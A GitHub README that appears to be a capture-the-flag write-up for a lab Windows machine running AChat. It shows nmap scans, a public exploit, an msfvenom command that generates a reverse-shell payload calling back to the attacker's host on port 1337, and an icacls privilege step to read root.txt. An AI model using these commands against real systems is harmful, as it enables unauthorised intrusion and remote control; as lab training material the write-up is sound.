Skip to content

Latest commit

 

History

History
81 lines (41 loc) · 2.06 KB

README.md

File metadata and controls

81 lines (41 loc) · 2.06 KB
nmap -p- --min-rate 10000 10.10.10.74 -Pn 

Alt text

After knowing open ports, let's do greater nmap scan.

nmap -A -sC -sV -p135,139,445,9255,9256 10.10.10.74 -Pn 

Alt text

I know from the results that is 'AChat' chat system, let's search publicly known exploit.

Alt text

I grab '36025' Python script which gives me shell.

But, I need to modify script's content with reverse shell code by generating via msfvenom command

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Alt text

I also change Socket's address via my target machine's IP Address.

Then, run the exploit.

Alt text

I got reverse shell from port (1337).

Alt text

user.txt

Alt text

While I want to read root.txt file, but it says 'Access denied'.

But I see that 'Alfred' user has privilege on 'Desktop' folder of administrator user.

icacls Desktop

Alt text

Then, I look at File Ownership information of 'root.txt' file via dir /q command.

Alt text

It means, I can give full permission to 'root.txt' file for 'alfred' user.

icacls root.txt /grant Alfred:F

I check that delegation works or not via icacls command.

Alt text

root.txt

Alt text